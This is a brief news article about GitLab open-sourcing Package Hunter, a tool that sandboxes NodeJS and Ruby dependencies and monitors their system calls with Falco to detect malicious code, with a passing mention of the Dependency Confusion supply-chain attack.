Recently GitLab open-sourced a tool that enables developers and security teams to detect malicious code in app dependencies. Package Hunter analyzes dependencies for both malicious code and other unexpected behavior. 

It installs the dependencies in a sandbox environment and then reports any suspicious behavior to the developer who can then further examine them.

According to GitLab, a recent review of open source software supply chain attacks found that malicious dependencies are common. The methods for delivering malicious dependencies have also become sophisticated. 

For example, earlier this year security researchers discovered a vulnerability dubbed Dependency Confusion in many popular package managers that can be used to trick the package manager into installing dependencies from a location that the attacker controls instead of the trusted package registry.  The attacker could then execute code to compromise production systems or CI environments, GitLab explained.

Further complicating the matter is that many existing dependency scanners are limited to identifying dependencies with known vulnerabilities and don’t tend to detect if a dependency executes malicious code. The company hopes Package Hunter will fill this need. 

Package Hunter uses Falco for system call monitoring and it supports testing NodeJS modules and Ruby Gems. 

GitLab has been using Package Hunter internally since November 2020 to test its own dependencies. “By making it publicly available, we hope to enable other projects to detect malicious code in their dependencies before it causes any harm and also to increase the general confidence in open source supply chains. Package Hunter is free and open source,” Dennis Appelt, staff security researcher at GitLab, wrote in a post